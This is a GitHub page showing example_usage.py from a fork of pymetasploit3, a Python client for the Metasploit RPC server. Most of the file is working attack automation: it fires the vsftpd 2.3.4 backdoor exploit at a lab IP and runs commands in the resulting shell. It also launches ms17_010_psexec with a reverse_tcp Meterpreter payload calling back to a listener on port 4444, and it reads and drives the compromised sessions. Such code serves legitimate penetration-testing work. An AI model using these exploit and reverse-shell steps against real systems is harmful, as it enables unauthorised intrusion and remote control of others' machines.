forked from DanMcInerney/pymetasploit3
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexample_usage.py
executable file
·177 lines (131 loc) · 4.49 KB
/
example_usage.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
from pymetasploit3.msfrpc import MsfRpcClient
## Usage example
# Connect to the RPC server
client = MsfRpcClient('mypassword')
# Get an exploit object
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
# Set the exploit options
exploit['RHOST'] = "192.168.115.80"
exploit['RPORT'] = "21"
# Execute the exploit, success will return a jobid
exploit.execute(payload="cmd/unix/interact")
# Find all available sessions
print("Sessions avaiables : ")
for s in client.sessions.list.keys():
print(s)
# Get a shell object
shell = client.sessions.session(list(client.sessions.list.keys())[0])
# Write to the shell
shell.write('whoami')
# Print the output
print(shell.read())
# Stop the shell
shell.stop()
## Console
# Create a console and get the new console ID
client.consoles.console().cid
# >>> "1"
# Destroy a console
client.console.console('1').destroy
# Write to console
client.consoles.console('1').write('show options')
# Read from console
client.consoles.console('1').read()
# >>> {'data': 'Global Options:\n===============\n\n Option...'
# 'prompt': '\x01\x02msf5\x01\x02 \x01\x02> ',
# 'busy': False}
# Check if console is busy
client.consoles.console('1').is_busy()
# >>> False
## Modules
# List exploit modules
client.modules.exploits
# >>> ['aix/local/ibstat_path',
# 'aix/rpc_cmsd_opcode21',
# 'aix/rpc_ttdbserverd_realpath',
# ...]
# Use a module
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
# Set module options
exploit['RHOST'] = "192.168.115.80"
exploit['RPORT'] = "21"
# Get required options
exploit.required
# >>> ['RHOSTS', 'RPORT', 'SSLVersion', 'ConnectTimeout']
# Get required options that haven't been set yet
exploit.missing_required
# >>> ['RHOSTS']
# See all the options which have been set
exploit.runoptions
# >>> {'VERBOSE': False,
# 'WfsDelay': 0,
# 'EnableContextEncoding': False,
# 'DisablePayloadHandler': False,
# 'RPORT': 21,
# 'SSL': False,
# 'SSLVersion': 'Auto',
# 'SSLVerifyMode': 'PEER',
# 'ConnectTimeout': 10,
# 'TCP::max_send_size': 0,
# 'TCP::send_delay': 0}
# Get the CVE/OSVDB/BID of an exploit
exploit.references
# >>> [['CVE', '2013-4011'],
# ['OSVDB', '95420'],
# ['BID', '61287'],
# ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827'],
# ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756']]
# Get an option's info
exploit.optioninfo('RHOSTS')
# >>> {'type': 'addressrange',
# 'required': True,
# 'advanced': False,
# 'evasion': False,
# 'desc': 'The target address range or CIDR identifier'}
# Get targets
exploit.targets
# >>> {0: 'Automatic'}
# Set the target
exploit.target = 0
# Get target-compatible payloads
exploit.targetpayloads()
# >>> ['cmd/unix/interact']
# Execute the module
# If 'job_id' is None, the module failed to execute
exploit.execute(payload='cmd/unix/interact')
# >>> {'job_id': 1, 'uuid': 'hb2f0yei'}
# Execute the module and return the output
cid = client.consoles.console().cid
client.consoles.console(cid).run_module_with_output(exploit, payload='cmd/unix/interact')
# >>> '... [-] 127.0.0.1:21 - Exploit failed [unreachable]: Rex::ConnectionRefused \
# The connection was refused by the remote host (127.0.0.1:21).\n[*] Exploit completed, but no session was created.\n'
## Sessions
# Get all sessions
client.sessions.list
# >>> {'1': {'type': 'meterpreter',
# 'tunnel_local': '192.168.1.2:4444',
# [...]
# 'platform': 'windows'}}
# Get a session's info
client.sessions.session('1').info
# Write to a session
client.sessions.session('1').write('help')
# Read a session
client.sessions.session('1').read()
# >>> '\nCore Commands\n=============\n\n Command Description\n ------- [...]'
# Run a command and wait for the output
client.sessions.session('1').run_with_output('arp')
# >>> '\nArp stuff'
# Run a shell command within a meterpreter session
client.sessions.session('1').run_shell_cmd_with_output('whoami')
# How to set Payload Options
# Some exploits need to set payload options, here's an example on how to do so
exploit = client.modules.use('exploit', 'windows/smb/ms17_010_psexec')
exploit['RHOSTS'] = '172.28.128.13'
# create a payload object as normal
payload = client.modules.use('payload', 'windows/meterpreter/reverse_tcp')
# add paylod specific options
payload['LHOST'] = '172.28.128.1'
payload['LPORT'] = 4444
# Execute the exploit with the linked payload, success will return a jobid
exploit.execute(payload=payload)